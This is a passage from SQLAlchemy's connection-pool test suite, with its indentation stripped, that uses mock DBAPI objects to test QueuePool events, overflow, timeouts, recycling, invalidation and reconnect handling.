from sqlalchemy.testing.mock import call
from sqlalchemy.testing.mock import Mock
from sqlalchemy.testing.mock import patch
from sqlalchemy.testing.util import gc_collect
from sqlalchemy.testing.util import lazy_gc
join_timeout = 10
def MockDBAPI(): # noqa
def cursor():
return Mock()
def connect(*arg, **kw):
def close():
conn.closed = True
# mock seems like it might have an issue logging
# call_count correctly under threading, not sure.
# adding a side_effect for close seems to help.
conn = Mock(
cursor=Mock(side_effect=cursor),
close=Mock(side_effect=close),
closed=False,
)
return conn
def shutdown(value):
if value:
db.connect = Mock(side_effect=Exception("connect failed"))
else:
db.connect = Mock(side_effect=connect)
db.is_shutdown = value
db = Mock(
connect=Mock(side_effect=connect), shutdown=shutdown, is_shutdown=False
)
return db
class PoolTestBase(fixtures.TestBase):
def setup(self):
pool.clear_managers()
self._teardown_conns = []
def teardown(self):
for ref in self._teardown_conns:
conn = ref()
if conn:
conn.close()
@classmethod
def teardown_class(cls):
pool.clear_managers()
def _with_teardown(self, connection):
self._teardown_conns.append(weakref.ref(connection))
return connection
def _queuepool_fixture(self, **kw):
dbapi, pool = self._queuepool_dbapi_fixture(**kw)
return pool
def _queuepool_dbapi_fixture(self, **kw):
dbapi = MockDBAPI()
return (
dbapi,
pool.QueuePool(creator=lambda: dbapi.connect("foo.db"), **kw),
)
class PoolTest(PoolTestBase):
@testing.fails_on(
"+pyodbc", "pyodbc cursor doesn't implement tuple __eq__"
)
@testing.fails_on("+pg8000", "returns [1], not (1,)")
def test_cursor_iterable(self):
conn = testing.db.raw_connection()
cursor = conn.cursor()
cursor.execute(str(select([1], bind=testing.db)))
expected = [(1,)]
for row in cursor:
eq_(row, expected.pop(0))
def test_no_connect_on_recreate(self):
def creator():
raise Exception("no creates allowed")
for cls in (
pool.SingletonThreadPool,
pool.StaticPool,
pool.QueuePool,
pool.NullPool,
pool.AssertionPool,
):
p = cls(creator=creator)
p.dispose()
p2 = p.recreate()
assert p2.__class__ is cls
mock_dbapi = MockDBAPI()
p = cls(creator=mock_dbapi.connect)
conn = p.connect()
conn.close()
mock_dbapi.connect.side_effect = Exception("error!")
p.dispose()
p.recreate()
def test_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.info)
self.assert_(c.info is c._connection_record.info)
c.info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.info)
c.invalidate()
c = p.connect()
self.assert_("foo" not in c.info)
c.info["foo2"] = "bar2"
c.detach()
self.assert_("foo2" in c.info)
c2 = p.connect()
is_not_(c.connection, c2.connection)
assert not c2.info
assert "foo2" in c.info
def test_rec_info(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c = p.connect()
self.assert_(not c.record_info)
self.assert_(c.record_info is c._connection_record.record_info)
c.record_info["foo"] = "bar"
c.close()
del c
c = p.connect()
self.assert_("foo" in c.record_info)
c.invalidate()
c = p.connect()
self.assert_("foo" in c.record_info)
c.record_info["foo2"] = "bar2"
c.detach()
is_(c.record_info, None)
is_(c._connection_record, None)
c2 = p.connect()
assert c2.record_info
assert "foo2" in c2.record_info
def test_rec_unconnected(self):
# test production of a _ConnectionRecord with an
# initially unconnected state.
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1, connect=False)
assert not r1.connection
c1 = r1.get_connection()
is_(c1, r1.connection)
def test_rec_close_reopen(self):
# test that _ConnectionRecord.close() allows
# the record to be reusable
dbapi = MockDBAPI()
p1 = pool.Pool(creator=lambda: dbapi.connect("foo.db"))
r1 = pool._ConnectionRecord(p1)
c1 = r1.connection
c2 = r1.get_connection()
is_(c1, c2)
r1.close()
assert not r1.connection
eq_(c1.mock_calls, [call.close()])
c2 = r1.get_connection()
is_not_(c1, c2)
is_(c2, r1.connection)
eq_(c2.mock_calls, [])
class PoolDialectTest(PoolTestBase):
def _dialect(self):
canary = []
class PoolDialect(object):
def do_rollback(self, dbapi_connection):
canary.append("R")
dbapi_connection.rollback()
def do_commit(self, dbapi_connection):
canary.append("C")
dbapi_connection.commit()
def do_close(self, dbapi_connection):
canary.append("CL")
dbapi_connection.close()
return PoolDialect(), canary
def _do_test(self, pool_cls, assertion):
mock_dbapi = MockDBAPI()
dialect, canary = self._dialect()
p = pool_cls(creator=mock_dbapi.connect)
p._dialect = dialect
conn = p.connect()
conn.close()
p.dispose()
p.recreate()
conn = p.connect()
conn.close()
eq_(canary, assertion)
def test_queue_pool(self):
self._do_test(pool.QueuePool, ["R", "CL", "R"])
def test_assertion_pool(self):
self._do_test(pool.AssertionPool, ["R", "CL", "R"])
def test_singleton_pool(self):
self._do_test(pool.SingletonThreadPool, ["R", "CL", "R"])
def test_null_pool(self):
self._do_test(pool.NullPool, ["R", "CL", "R", "CL"])
def test_static_pool(self):
self._do_test(pool.StaticPool, ["R", "R"])
class PoolEventsTest(PoolTestBase):
def _first_connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def first_connect(*arg, **kw):
canary.append("first_connect")
event.listen(p, "first_connect", first_connect)
return p, canary
def _connect_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def connect(*arg, **kw):
canary.append("connect")
event.listen(p, "connect", connect)
return p, canary
def _checkout_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkout(*arg, **kw):
canary.append("checkout")
event.listen(p, "checkout", checkout)
return p, canary
def _checkin_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def checkin(*arg, **kw):
canary.append("checkin")
event.listen(p, "checkin", checkin)
return p, canary
def _reset_event_fixture(self):
p = self._queuepool_fixture()
canary = []
def reset(*arg, **kw):
canary.append("reset")
event.listen(p, "reset", reset)
return p, canary
def _invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "invalidate", canary)
return p, canary
def _soft_invalidate_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "soft_invalidate", canary)
return p, canary
def _close_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close", canary)
return p, canary
def _detach_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "detach", canary)
return p, canary
def _close_detached_event_fixture(self):
p = self._queuepool_fixture()
canary = Mock()
event.listen(p, "close_detached", canary)
return p, canary
def test_close(self):
p, canary = self._close_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.close()
eq_(canary.mock_calls, [])
p.dispose()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach(self):
p, canary = self._detach_event_fixture()
c1 = p.connect()
connection = c1.connection
rec = c1._connection_record
c1.detach()
eq_(canary.mock_calls, [call(connection, rec)])
def test_detach_close(self):
p, canary = self._close_detached_event_fixture()
c1 = p.connect()
connection = c1.connection
c1.detach()
c1.close()
eq_(canary.mock_calls, [call(connection)])
def test_first_connect_event(self):
p, canary = self._first_connect_event_fixture()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_event_fires_once(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p.connect()
eq_(canary, ["first_connect"])
def test_first_connect_on_previously_recreated(self):
p, canary = self._first_connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_first_connect_on_subsequently_recreated(self):
p, canary = self._first_connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["first_connect", "first_connect"])
def test_connect_event(self):
p, canary = self._connect_event_fixture()
p.connect()
eq_(canary, ["connect"])
def test_connect_event_fires_subsequent(self):
p, canary = self._connect_event_fixture()
c1 = p.connect() # noqa
c2 = p.connect() # noqa
eq_(canary, ["connect", "connect"])
def test_connect_on_previously_recreated(self):
p, canary = self._connect_event_fixture()
p2 = p.recreate()
p.connect()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_connect_on_subsequently_recreated(self):
p, canary = self._connect_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["connect", "connect"])
def test_checkout_event(self):
p, canary = self._checkout_event_fixture()
p.connect()
eq_(canary, ["checkout"])
def test_checkout_event_fires_subsequent(self):
p, canary = self._checkout_event_fixture()
p.connect()
p.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkout_event_on_subsequently_recreated(self):
p, canary = self._checkout_event_fixture()
p.connect()
p2 = p.recreate()
p2.connect()
eq_(canary, ["checkout", "checkout"])
def test_checkin_event(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
def test_reset_event(self):
p, canary = self._reset_event_fixture()
c1 = p.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["reset"])
def test_soft_invalidate_event_no_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate(soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_soft_invalidate_event_exception(self):
p, canary = self._soft_invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc, soft=True)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_invalidate_event_no_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
c1.invalidate()
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is None
def test_invalidate_event_exception(self):
p, canary = self._invalidate_event_fixture()
c1 = p.connect()
c1.close()
assert not canary.called
c1 = p.connect()
dbapi_con = c1.connection
exc = Exception("hi")
c1.invalidate(exc)
assert canary.call_args_list[0][0][0] is dbapi_con
assert canary.call_args_list[0][0][2] is exc
def test_checkin_event_gc(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
eq_(canary, [])
del c1
lazy_gc()
eq_(canary, ["checkin"])
def test_checkin_event_on_subsequently_recreated(self):
p, canary = self._checkin_event_fixture()
c1 = p.connect()
p2 = p.recreate()
c2 = p2.connect()
eq_(canary, [])
c1.close()
eq_(canary, ["checkin"])
c2.close()
eq_(canary, ["checkin", "checkin"])
def test_listen_targets_scope(self):
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
def listen_four(*args):
canary.append("listen_four")
engine = testing_engine(testing.db.url)
event.listen(pool.Pool, "connect", listen_one)
event.listen(engine.pool, "connect", listen_two)
event.listen(engine, "connect", listen_three)
event.listen(engine.__class__, "connect", listen_four)
engine.execute(select([1])).close()
eq_(
canary, ["listen_one", "listen_four", "listen_two", "listen_three"]
)
def test_listen_targets_per_subclass(self):
"""test that listen() called on a subclass remains specific to
that subclass."""
canary = []
def listen_one(*args):
canary.append("listen_one")
def listen_two(*args):
canary.append("listen_two")
def listen_three(*args):
canary.append("listen_three")
event.listen(pool.Pool, "connect", listen_one)
event.listen(pool.QueuePool, "connect", listen_two)
event.listen(pool.SingletonThreadPool, "connect", listen_three)
p1 = pool.QueuePool(creator=MockDBAPI().connect)
p2 = pool.SingletonThreadPool(creator=MockDBAPI().connect)
assert listen_one in p1.dispatch.connect
assert listen_two in p1.dispatch.connect
assert listen_three not in p1.dispatch.connect
assert listen_one in p2.dispatch.connect
assert listen_two not in p2.dispatch.connect
assert listen_three in p2.dispatch.connect
p1.connect()
eq_(canary, ["listen_one", "listen_two"])
p2.connect()
eq_(canary, ["listen_one", "listen_two", "listen_one", "listen_three"])
def test_connect_event_fails_invalidates(self):
fail = False
def listen_one(conn, rec):
if fail:
raise Exception("it failed")
def listen_two(conn, rec):
rec.info["important_flag"] = True
p1 = pool.QueuePool(
creator=MockDBAPI().connect, pool_size=1, max_overflow=0
)
event.listen(p1, "connect", listen_one)
event.listen(p1, "connect", listen_two)
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.invalidate()
conn.close()
fail = True
assert_raises(Exception, p1.connect)
fail = False
conn = p1.connect()
eq_(conn.info["important_flag"], True)
conn.close()
def teardown(self):
# TODO: need to get remove() functionality
# going
pool.Pool.dispatch._clear()
class PoolFirstConnectSyncTest(PoolTestBase):
# test [ticket:2964]
@testing.requires.timing_intensive
def test_sync(self):
pool = self._queuepool_fixture(pool_size=3, max_overflow=0)
evt = Mock()
@event.listens_for(pool, "first_connect")
def slow_first_connect(dbapi_con, rec):
time.sleep(1)
evt.first_connect()
@event.listens_for(pool, "connect")
def on_connect(dbapi_con, rec):
evt.connect()
def checkout():
for j in range(2):
c1 = pool.connect()
time.sleep(0.02)
c1.close()
time.sleep(0.02)
threads = []
for i in range(5):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
eq_(
evt.mock_calls,
[
call.first_connect(),
call.connect(),
call.connect(),
call.connect(),
],
)
class QueuePoolTest(PoolTestBase):
def test_queuepool_del(self):
self._do_testqueuepool(useclose=False)
def test_queuepool_close(self):
self._do_testqueuepool(useclose=True)
def _do_testqueuepool(self, useclose=False):
p = self._queuepool_fixture(pool_size=3, max_overflow=-1)
def status(pool):
return (
pool.size(),
pool.checkedin(),
pool.overflow(),
pool.checkedout(),
)
c1 = p.connect()
self.assert_(status(p) == (3, 0, -2, 1))
c2 = p.connect()
self.assert_(status(p) == (3, 0, -1, 2))
c3 = p.connect()
self.assert_(status(p) == (3, 0, 0, 3))
c4 = p.connect()
self.assert_(status(p) == (3, 0, 1, 4))
c5 = p.connect()
self.assert_(status(p) == (3, 0, 2, 5))
c6 = p.connect()
self.assert_(status(p) == (3, 0, 3, 6))
if useclose:
c4.close()
c3.close()
c2.close()
else:
c4 = c3 = c2 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 3, 3))
if useclose:
c1.close()
c5.close()
c6.close()
else:
c1 = c5 = c6 = None
lazy_gc()
self.assert_(status(p) == (3, 3, 0, 0))
c1 = p.connect()
c2 = p.connect()
self.assert_(status(p) == (3, 1, 0, 2), status(p))
if useclose:
c2.close()
else:
c2 = None
lazy_gc()
self.assert_(status(p) == (3, 2, 0, 1))
c1.close()
lazy_gc()
assert not pool._refs
def test_timeout_accessor(self):
expected_timeout = 123
p = self._queuepool_fixture(timeout=expected_timeout)
eq_(p.timeout(), expected_timeout)
@testing.requires.timing_intensive
def test_timeout(self):
p = self._queuepool_fixture(pool_size=3, max_overflow=0, timeout=2)
c1 = p.connect() # noqa
c2 = p.connect() # noqa
c3 = p.connect() # noqa
now = time.time()
assert_raises(tsa.exc.TimeoutError, p.connect)
assert int(time.time() - now) == 2
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_timeout_race(self):
# test a race condition where the initial connecting threads all race
# to queue.Empty, then block on the mutex. each thread consumes a
# connection as they go in. when the limit is reached, the remaining
# threads go in, and get TimeoutError; even though they never got to
# wait for the timeout on queue.get(). the fix involves checking the
# timeout again within the mutex, and if so, unlocking and throwing
# them back to the start of do_get()
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=lambda: dbapi.connect(delay=0.05),
pool_size=2,
max_overflow=1,
use_threadlocal=False,
timeout=3,
)
timeouts = []
def checkout():
for x in range(1):
now = time.time()
try:
c1 = p.connect()
except tsa.exc.TimeoutError:
timeouts.append(time.time() - now)
continue
time.sleep(4)
c1.close()
threads = []
for i in range(10):
th = threading.Thread(target=checkout)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
assert len(timeouts) > 0
for t in timeouts:
assert t >= 3, "Not all timeouts were >= 3 seconds %r" % timeouts
# normally, the timeout should under 4 seconds,
# but on a loaded down buildbot it can go up.
assert t < 14, "Not all timeouts were < 14 seconds %r" % timeouts
def _test_overflow(self, thread_count, max_overflow):
gc_collect()
dbapi = MockDBAPI()
mutex = threading.Lock()
def creator():
time.sleep(0.05)
with mutex:
return dbapi.connect()
p = pool.QueuePool(
creator=creator, pool_size=3, timeout=2, max_overflow=max_overflow
)
peaks = []
def whammy():
for i in range(10):
try:
con = p.connect()
time.sleep(0.005)
peaks.append(p.overflow())
con.close()
del con
except tsa.exc.TimeoutError:
pass
threads = []
for i in range(thread_count):
th = threading.Thread(target=whammy)
th.start()
threads.append(th)
for th in threads:
th.join(join_timeout)
self.assert_(max(peaks) <= max_overflow)
lazy_gc()
assert not pool._refs
def test_overflow_reset_on_failed_connect(self):
dbapi = Mock()
def failing_dbapi():
time.sleep(2)
raise Exception("connection failed")
creator = dbapi.connect
def create():
return creator()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
c1 = self._with_teardown(p.connect()) # noqa
c2 = self._with_teardown(p.connect()) # noqa
c3 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1)
creator = failing_dbapi
assert_raises(Exception, p.connect)
eq_(p._overflow, 1)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_hanging_connect_within_overflow(self):
"""test that a single connect() call which is hanging
does not block other connections from proceeding."""
dbapi = Mock()
mutex = threading.Lock()
def hanging_dbapi():
time.sleep(2)
with mutex:
return dbapi.connect()
def fast_dbapi():
with mutex:
return dbapi.connect()
creator = threading.local()
def create():
return creator.mock_connector()
def run_test(name, pool, should_hang):
if should_hang:
creator.mock_connector = hanging_dbapi
else:
creator.mock_connector = fast_dbapi
conn = pool.connect()
conn.operation(name)
time.sleep(1)
conn.close()
p = pool.QueuePool(creator=create, pool_size=2, max_overflow=3)
threads = [
threading.Thread(target=run_test, args=("success_one", p, False)),
threading.Thread(target=run_test, args=("success_two", p, False)),
threading.Thread(target=run_test, args=("overflow_one", p, True)),
threading.Thread(target=run_test, args=("overflow_two", p, False)),
threading.Thread(
target=run_test, args=("overflow_three", p, False)
),
]
for t in threads:
t.start()
time.sleep(0.2)
for t in threads:
t.join(timeout=join_timeout)
eq_(
dbapi.connect().operation.mock_calls,
[
call("success_one"),
call("success_two"),
call("overflow_two"),
call("overflow_three"),
call("overflow_one"),
],
)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_waiters_handled(self):
"""test that threads waiting for connections are
handled when the pool is replaced.
"""
mutex = threading.Lock()
dbapi = MockDBAPI()
def creator():
mutex.acquire()
try:
return dbapi.connect()
finally:
mutex.release()
success = []
for timeout in (None, 30):
for max_overflow in (0, -1, 3):
p = pool.QueuePool(
creator=creator,
pool_size=2,
timeout=timeout,
max_overflow=max_overflow,
)
def waiter(p, timeout, max_overflow):
success_key = (timeout, max_overflow)
conn = p.connect()
success.append(success_key)
time.sleep(0.1)
conn.close()
c1 = p.connect() # noqa
c2 = p.connect()
threads = []
for i in range(2):
t = threading.Thread(
target=waiter, args=(p, timeout, max_overflow)
)
t.daemon = True
t.start()
threads.append(t)
# this sleep makes sure that the
# two waiter threads hit upon wait()
# inside the queue, before we invalidate the other
# two conns
time.sleep(0.2)
p._invalidate(c2)
for t in threads:
t.join(join_timeout)
eq_(len(success), 12, "successes: %s" % success)
def test_connrec_invalidated_within_checkout_no_race(self):
"""Test that a concurrent ConnectionRecord.invalidate() which
occurs after the ConnectionFairy has called
_ConnectionRecord.checkout()
but before the ConnectionFairy tests "fairy.connection is None"
will not result in an InvalidRequestError.
This use case assumes that a listener on the checkout() event
will be raising DisconnectionError so that a reconnect attempt
may occur.
"""
dbapi = MockDBAPI()
def creator():
return dbapi.connect()
p = pool.QueuePool(creator=creator, pool_size=1, max_overflow=0)
conn = p.connect()
conn.close()
_existing_checkout = pool._ConnectionRecord.checkout
@classmethod
def _decorate_existing_checkout(cls, *arg, **kw):
fairy = _existing_checkout(*arg, **kw)
connrec = fairy._connection_record
connrec.invalidate()
return fairy
with patch(
"sqlalchemy.pool._ConnectionRecord.checkout",
_decorate_existing_checkout,
):
conn = p.connect()
is_(conn._connection_record.connection, None)
conn.close()
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_notify_waiters(self):
dbapi = MockDBAPI()
canary = []
def creator():
canary.append(1)
return dbapi.connect()
p1 = pool.QueuePool(
creator=creator, pool_size=1, timeout=None, max_overflow=0
)
def waiter(p):
conn = p.connect()
canary.append(2)
time.sleep(0.5)
conn.close()
c1 = p1.connect()
threads = []
for i in range(5):
t = threading.Thread(target=waiter, args=(p1,))
t.start()
threads.append(t)
time.sleep(0.5)
eq_(canary, [1])
# this also calls invalidate()
# on c1
p1._invalidate(c1)
for t in threads:
t.join(join_timeout)
eq_(canary, [1, 1, 2, 2, 2, 2, 2])
def test_dispose_closes_pooled(self):
dbapi = MockDBAPI()
p = pool.QueuePool(
creator=dbapi.connect, pool_size=2, timeout=None, max_overflow=0
)
c1 = p.connect()
c2 = p.connect()
c1_con = c1.connection
c2_con = c2.connection
c1.close()
eq_(c1_con.close.call_count, 0)
eq_(c2_con.close.call_count, 0)
p.dispose()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# currently, if a ConnectionFairy is closed
# after the pool has been disposed, there's no
# flag that states it should be invalidated
# immediately - it just gets returned to the
# pool normally...
c2.close()
eq_(c1_con.close.call_count, 1)
eq_(c2_con.close.call_count, 0)
# ...and that's the one we'll get back next.
c3 = p.connect()
assert c3.connection is c2_con
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_no_overflow(self):
self._test_overflow(40, 0)
@testing.requires.threading_with_mock
@testing.requires.timing_intensive
def test_max_overflow(self):
self._test_overflow(40, 5)
def test_overflow_no_gc(self):
p = self._queuepool_fixture(pool_size=2, max_overflow=2)
# disable weakref collection of the
# underlying connections
strong_refs = set()
def _conn():
c = p.connect()
strong_refs.add(c.connection)
return c
for j in range(5):
# open 4 conns at a time. each time this
# will yield two pooled connections + two
# overflow connections.
conns = [_conn() for i in range(4)]
for c in conns:
c.close()
# doing that for a total of 5 times yields
# ten overflow connections closed plus the
# two pooled connections unclosed.
eq_(
set([c.close.call_count for c in strong_refs]),
set([1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 0]),
)
def test_recycle(self):
with patch("sqlalchemy.pool.base.time.time") as mock:
mock.return_value = 10000
p = self._queuepool_fixture(
pool_size=1, max_overflow=0, recycle=30
)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
mock.return_value = 10001
c2 = p.connect()
is_(c2.connection, c_ref())
c2.close()
mock.return_value = 10035
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
p._invalidate(c2)
assert c2_rec.connection is None
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
@testing.requires.timing_intensive
def test_recycle_on_soft_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_ref = weakref.ref(c1.connection)
c1.close()
c2 = p.connect()
is_(c2.connection, c_ref())
c2_rec = c2._connection_record
c2.invalidate(soft=True)
is_(c2_rec.connection, c2.connection)
c2.close()
time.sleep(0.5)
c3 = p.connect()
is_not_(c3.connection, c_ref())
is_(c3._connection_record, c2_rec)
is_(c2_rec.connection, c3.connection)
def _no_wr_finalize(self):
finalize_fairy = pool._finalize_fairy
def assert_no_wr_callback(
connection, connection_record, pool, ref, echo, fairy=None
):
if fairy is None:
raise AssertionError(
"finalize fairy was called as a weakref callback"
)
return finalize_fairy(
connection, connection_record, pool, ref, echo, fairy
)
return patch.object(pool, "_finalize_fairy", assert_no_wr_callback)
def _assert_cleanup_on_pooled_reconnect(self, dbapi, p):
# p is QueuePool with size=1, max_overflow=2,
# and one connection in the pool that will need to
# reconnect when next used (either due to recycle or invalidate)
with self._no_wr_finalize():
eq_(p.checkedout(), 0)
eq_(p._overflow, 0)
dbapi.shutdown(True)
assert_raises(Exception, p.connect)
eq_(p._overflow, 0)
eq_(p.checkedout(), 0) # and not 1
dbapi.shutdown(False)
c1 = self._with_teardown(p.connect()) # noqa
assert p._pool.empty() # poolsize is one, so we're empty OK
c2 = self._with_teardown(p.connect()) # noqa
eq_(p._overflow, 1) # and not 2
# this hangs if p._overflow is 2
c3 = self._with_teardown(p.connect())
c3.close()
def test_error_on_pooled_reconnect_cleanup_invalidate(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.invalidate()
c1.close()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.timing_intensive
def test_error_on_pooled_reconnect_cleanup_recycle(self):
dbapi, p = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2, recycle=1
)
c1 = p.connect()
c1.close()
time.sleep(1.5)
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
def test_connect_handler_not_called_for_recycled(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
canary = Mock()
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
event.listen(p, "connect", canary.connect)
event.listen(p, "checkout", canary.checkout)
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
eq_(
canary.mock_calls,
[call.connect(ANY, ANY), call.checkout(ANY, ANY, ANY)],
)
def test_connect_checkout_handler_always_gets_info(self):
"""test [ticket:3497]"""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=2, max_overflow=2)
c1 = p.connect()
c2 = p.connect()
c1.close()
c2.close()
dbapi.shutdown(True)
bad = p.connect()
p._invalidate(bad)
bad.close()
assert p._invalidate_time
@event.listens_for(p, "connect")
def connect(conn, conn_rec):
conn_rec.info["x"] = True
@event.listens_for(p, "checkout")
def checkout(conn, conn_rec, conn_f):
assert "x" in conn_rec.info
assert_raises(Exception, p.connect)
p._pool.queue = collections.deque(
[c for c in p._pool.queue if c.connection is not None]
)
dbapi.shutdown(False)
c = p.connect()
c.close()
def test_error_on_pooled_reconnect_cleanup_wcheckout_event(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=2)
c1 = p.connect()
c1.close()
@event.listens_for(p, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if dbapi.is_shutdown:
raise tsa.exc.DisconnectionError()
self._assert_cleanup_on_pooled_reconnect(dbapi, p)
@testing.requires.predictable_gc
def test_userspace_disconnectionerror_weakref_finalizer(self):
dbapi, pool = self._queuepool_dbapi_fixture(
pool_size=1, max_overflow=2
)
@event.listens_for(pool, "checkout")
def handle_checkout_event(dbapi_con, con_record, con_proxy):
if getattr(dbapi_con, "boom") == "yes":
raise tsa.exc.DisconnectionError()
conn = pool.connect()
old_dbapi_conn = conn.connection
conn.close()
eq_(old_dbapi_conn.mock_calls, [call.rollback()])
old_dbapi_conn.boom = "yes"
conn = pool.connect()
dbapi_conn = conn.connection
del conn
gc_collect()
# new connection was reset on return appropriately
eq_(dbapi_conn.mock_calls, [call.rollback()])
# old connection was just closed - did not get an
# erroneous reset on return
eq_(old_dbapi_conn.mock_calls, [call.rollback(), call.close()])
@testing.requires.timing_intensive
def test_recycle_pool_no_race(self):
def slow_close():
slow_closing_connection._slow_close()
time.sleep(0.5)
slow_closing_connection = Mock()
slow_closing_connection.connect.return_value.close = slow_close
class Error(Exception):
pass
dialect = Mock()
dialect.is_disconnect = lambda *arg, **kw: True
dialect.dbapi.Error = Error
pools = []
class TrackQueuePool(pool.QueuePool):
def __init__(self, *arg, **kw):
pools.append(self)
super(TrackQueuePool, self).__init__(*arg, **kw)
def creator():
return slow_closing_connection.connect()
p1 = TrackQueuePool(creator=creator, pool_size=20)
from sqlalchemy import create_engine
eng = create_engine(testing.db.url, pool=p1, _initialize=False)
eng.dialect = dialect
# 15 total connections
conns = [eng.connect() for i in range(15)]
# return 8 back to the pool
for conn in conns[3:10]:
conn.close()
def attempt(conn):
time.sleep(random.random())
try:
conn._handle_dbapi_exception(
Error(), "statement", {}, Mock(), Mock()
)
except tsa.exc.DBAPIError:
pass
# run an error + invalidate operation on the remaining 7 open
# connections
threads = []
for conn in conns:
t = threading.Thread(target=attempt, args=(conn,))
t.start()
threads.append(t)
for t in threads:
t.join()
# return all 15 connections to the pool
for conn in conns:
conn.close()
# re-open 15 total connections
conns = [eng.connect() for i in range(15)]
# 15 connections have been fully closed due to invalidate
assert slow_closing_connection._slow_close.call_count == 15
# 15 initial connections + 15 reconnections
assert slow_closing_connection.connect.call_count == 30
assert len(pools) <= 2, len(pools)
def test_invalidate(self):
p = self._queuepool_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_recreate(self):
p = self._queuepool_fixture(
reset_on_return=None, pool_size=1, max_overflow=0
)
p2 = p.recreate()
assert p2.size() == 1
assert p2._reset_on_return is pool.reset_none
assert p2._use_threadlocal is False
assert p2._max_overflow == 0
def test_reconnect(self):
"""tests reconnect operations at the pool level. SA's
engine/dialect includes another layer of reconnect support for
'database was lost' errors."""
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c_id = c1.connection.id
c1.close()
c1 = None
c1 = p.connect()
assert c1.connection.id == c_id
dbapi.raise_error = True
c1.invalidate()
c1 = None
c1 = p.connect()
assert c1.connection.id != c_id
def test_detach(self):
dbapi, p = self._queuepool_dbapi_fixture(pool_size=1, max_overflow=0)
c1 = p.connect()
c1.detach()
